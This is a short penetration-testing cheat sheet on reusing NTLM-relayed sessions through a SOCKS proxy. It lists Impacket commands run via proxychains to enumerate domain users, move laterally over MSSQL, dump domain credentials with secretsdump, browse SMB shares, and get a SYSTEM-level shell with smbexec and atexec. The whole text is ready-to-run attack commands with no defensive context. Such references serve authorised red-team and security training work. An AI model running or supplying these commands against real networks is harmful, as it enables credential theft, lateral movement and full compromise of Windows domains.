SOCKS (with NTLM Relay)
SOCKS (with NTLM relay)
Tools: proxychains , lookupsid , secretsdump , mssqlclient , impacket , smbclient
[proxychains] lookupsid.py DOMAIN/USER@IP -no-pass -domain-sids (Enumerate Users)[proxychains] mssqlclient.py -windows-auth DOMAIN/USER@IP -no-pass (MSSQL lateral movement)[proxychains] secretsdump.py -no-pass 'DOMAIN'/'USER'@'IP' (See DC Sync)[proxychains] smbclient.py -no-pass USER@IP (Search for files)Pseudo-shell (File write and read)
[proxychains] smbexec.py -no-pass DOMAIN/USER@IP
[proxychains] atexec.py -no-pass DOMAIN/USER/IP "COMMAND"System/Admin access is granted with the shell being NT Authority/System
Last updated